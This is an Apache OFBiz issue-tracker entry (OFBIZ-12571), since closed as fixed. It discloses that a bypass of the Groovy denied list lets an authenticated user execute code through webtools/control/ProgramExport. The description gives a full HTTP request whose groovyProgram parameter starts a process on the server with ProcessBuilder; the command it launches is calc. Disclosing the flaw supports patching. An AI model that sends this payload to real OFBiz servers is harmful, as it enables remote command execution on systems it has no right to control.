Uploaded image for project: 'OFBiz'
  1. OFBiz
  2. OFBIZ-12571

Groovy denied list bypass causes post-auth RCE from webtools/control/ProgramExport

Attach filesAttach ScreenshotVotersWatch issueWatchersCreate sub-taskLinkCloneUpdate Comment AuthorReplace String in CommentUpdate Comment VisibilityDelete Comments
    XMLWordPrintableJSON

Details

    • Bug
    • Status: Closed
    • Major
    • Resolution: Fixed
    • 18.12.05
    • 18.12.06, 22.01.01
    • framework/webtools
    • None
    • ofbiz 18.12.05

    Description

      groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

       

      POST /webtools/control/ProgramExport HTTP/1.1
      Host: 192.168.1.178:8443
      Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
      Content-Type: application/x-www-form-urlencoded
      Connection: close
      Content-Length: 68
      
      groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 

      Attachments

        Activity

          This comment will be Viewable by All Users Viewable by All Users
          Cancel

          People

            jleroux Jacques Le Roux
            Y4er Y4er
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved:

              Slack

                Issue deployment